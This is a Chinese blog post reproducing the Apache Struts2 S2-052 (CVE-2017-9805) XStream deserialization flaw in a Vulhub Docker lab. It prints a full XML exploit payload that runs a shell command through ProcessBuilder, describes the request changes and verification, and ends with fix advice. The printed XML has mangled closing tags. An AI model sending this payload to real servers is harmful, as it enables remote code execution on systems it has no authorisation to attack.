rmi远程代码执行漏洞_Apache Struts2052远程代码执行漏洞复现

最新推荐文章于 2023-04-02 00:00:25 发布
最新推荐文章于 2023-04-02 00:00:25 发布
阅读量97 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39626089/article/details/112369638
版权

网安引领时代,弥天点亮未来   

c320bb6709db3146bd80f28db4e903ec.png 0x00漏洞简述

2017年9月5日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x的REST插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有任何类型过滤导致远程代码执行

c320bb6709db3146bd80f28db4e903ec.png 0x01影响版本

Apache Struts 2.5 – Struts2.5.12

Apache Struts 2.1.2– Struts 2.3.33

c320bb6709db3146bd80f28db4e903ec.png 0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

1、访问漏洞环境

http://192.168.60.131:8080/orders.xhtml   

faedd216ae0cfae0cfd0fb0c574a238f.png  

2、通过编辑进行POST数据的修改

dba567d9353681d629dbf4dff8efaa58.png

3、该rest-plugin会根据URI扩展名或 Content-Type来判断解析文件方式, 需要修改orders.xhtml或修改Content-Type头为application/xml,即可在Body中传递XML数据。

4、抓包对Content-Type类型修改

694ae23871a94371e107fb296880a4b8.png

5、XML格式Payload数据包构造

<map><entry>    <jdk.nashorn.internal.objects.NativeString>      <flags>0flags>      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">        <dataHandler>          <dataSource>            <is class="javax.crypto.CipherInputStream">              <cipher class="javax.crypto.NullCipher">                 <initialized>falseinitialized>                <opmode>0opmode>                <serviceIterator>                  <iter class="javax.imageio.spi.FilterIterator">                     <iter/>                     <next>                       <command><string>touchstring><string>/tmp/yunzui.txtstring>                       command>                      <redirectErrorStream>falseredirectErrorStream>                     next>                  iter>                  <filter class="javax.imageio.ImageIO$ContainsFilter">                     <method>                       <class>java.lang.ProcessBuilderclass>                      <name>startname>                       <parameter-types/>                     method>                    <name>fooname>                  filter>                  <next>foonext>                serviceIterator>                <lock/>              cipher>              <input/>              <ibuffer/>              <done>falsedone>              <ostart>0ostart>              <ofinish>0ofinish>              <closed>falseclosed>            is>            <consumed>falseconsumed>          dataSource>          <transferFlavors/>        dataHandler>        <dataLen>0dataLen>      value>    jdk.nashorn.internal.objects.NativeString>    <jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/>  entry>  <entry>    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>    <jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/>  entry> map>

6、通过payload进行漏洞利用,执行命令,返回响应500状态码,但是执行成功。

touch /tmp/yunzui.txt

969b894e39264758dea9f1f322f844a8.png

7、命令执行结果进入docker查看,成功执行。

docker-compose exec struts2 bashls -al /tmp

4d6b23d2e8bb388c42d411cf6f7f46d5.png

c320bb6709db3146bd80f28db4e903ec.png 0x03修复建议

1、升级Apachestruts 2.5.13或2.3.34版本

2、如果系统没有使用Struts REST插件,那么可以直接删除Struts REST插件,或者在配置文件中加入如下代码,限制服务端文件的扩展名

"struts.action.extension" value="xhtml,,json" />

3、限制服务端扩展类型,删除XML支持

c320bb6709db3146bd80f28db4e903ec.png 0x04参考链接

https://www.anquanke.com/post/id/86773

392e2f926f09ec4151068ed831b7fe7d.gif 

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

e3c821ee5213db9298fb2006aa4c7df4.png
weixin_39626089
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j远程执行漏洞,测试源码
12-22
标题提及的是“log4j远程执行漏洞”,这指的是Log4j 2框架中的一个严重安全漏洞,通常称为CVE-2021-44228,也被广泛称为“Log4Shell”漏洞。这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实现远程代码执行...
S2-052远程代码执行漏洞和S2-045远程代码执行漏洞复现
weixin_48739941的博客
04-21 1281
1.复现S2-052远程代码执行漏洞 (1) cd vulhub/struts2/s2-052 切换目录。 (2) docker-compose up -d 启动 (3) http://192.168.80.157:8080/orders.xhtml (4)burpsuite抓包。 (5)send to repeater,修改数据包: POST /orders/3/edit HTTP/1.1 Host: 192.168.80.157:8080 Accept: */* A
复现S2远程代码执行漏洞
m0_71326960的博客
04-02 550
2.进入s2-052执行docker-compose up -d命令(此处注意端口被占用会出现下载镜像报错,只需要把正在运行的镜像停止进程)6.说明利用成功,会在docker容器内创建文件/tmp/success,执行docker exec -it 容器id bash。点击send发送数据,出现状态码为200,和vulhub出计算结果后,即漏洞复现成功。3.随便上传一个文件,使用burpsuite进行抓包。1.使用docker搭建漏洞环境,进入目标文件夹。1.使用docker搭建漏洞环境。
struts2-052漏洞学习
qq_44312507的博客
12-17 726
struts2-052漏洞学习文档 一、了解漏洞 1.struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其...
S2-052 远程代码执行漏洞
EC_Carrot的博客
08-12 522
漏洞简介 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md 漏洞复现 访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o
第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结
ABC_123的博客
05-29 1912
Part1 前言Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能。目前通用的做法就是使用burpsuite插件进行被动扫描,原理就是把所有与用户交互参数都用各种log4j2检测payload测试一遍,然后观察DNSlog中有没有访问记录。这个漏洞检测............
rmi.zip_Java RMI_java rmi网络_java源代码 RMI
09-22
- **客户端代码**:客户端代码会查找注册表中的远程对象并调用其方法,执行相应的操作。 - **配置文件**:可能包含RMI相关的配置,比如RMIServer的端口号或者注册表的位置等。 学习和理解Java RMI,你需要掌握如何...
Log4J2远程代码执行漏洞修复20211210.rar
12-13
《Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2的远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
Struts2 S2-052漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
0x00 调试环境搭建 使用官方的rest-sample即可,下载2.5.12版本的源码https://github.com/apache/struts/archive/STRUTS_2_5_12.zip,然后将apps下面的rest-showcase源码脱下来。 Eclipse中新建一个maven工程,web.xml,pom.xml和struts.xml如下: pom.xml &...
struts2-052漏洞学习笔记
小小鱼的博客
09-14 2359
了解漏洞 struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Strut...
Strtus2漏洞 - Struts2-052 Struts2-057 Struts2-059
HAKUNAMATATATTA的博客
12-29 736
S2-052 S2-057 S2-059漏洞复现过程
Struts S2-052 漏洞复现
时光凉春衫薄的博客
07-23 1594
最近研究了一下docker 发现这个东西真的是快 漏洞环境许多地方都有现成的省的自己去搭建环境了。可以说真的是便利啊。 这两天又在研究struts2 下了环境做个试验玩玩 通过 docker pull medicean/vulapps:s_struts2_s2-052 下载这个漏洞的环境 查看本地的镜像 将这个镜像运行起来 我将docker的业务端口映射到本机的80端口上 ...
【S2-052Struts2远程命令执行漏洞(CVE-2017-9805)
Unitue_逆流
10-13 5942
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Struts2-052(CVE-2017-9805)远程代码执行漏洞复现
weixin_44253823的博客
11-06 1620
漏洞简介:2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStreamHandler反序列...
Struts2-052验证脚本
weixin_30604651的博客
11-19 357
下面分享一下Struts2-052验证的python脚本 #-*- coding:utf-8 -*- import requests url_list_path ="/home/d0ll4r/St2_052/UrlList.txt" s= requests.session() s.keep_alive = False headers = { "User-Agent":...
Struts2-052 漏洞复现
weixin_30505751的博客
01-02 330
s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描述: 该漏洞由lgtm.com的安全研究员汇报,编号为 CVE-2017-9805 ,漏洞危害程度为高危(Critical)。 当用户使用带有 XStream 程序的 Stru...
Struts2——052(CVE-2017-9805)远程代码执行漏洞复现
Stephen Wolf
11-23 1160
一、漏洞描述: 2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStre...
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
最新发布
06-06
RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值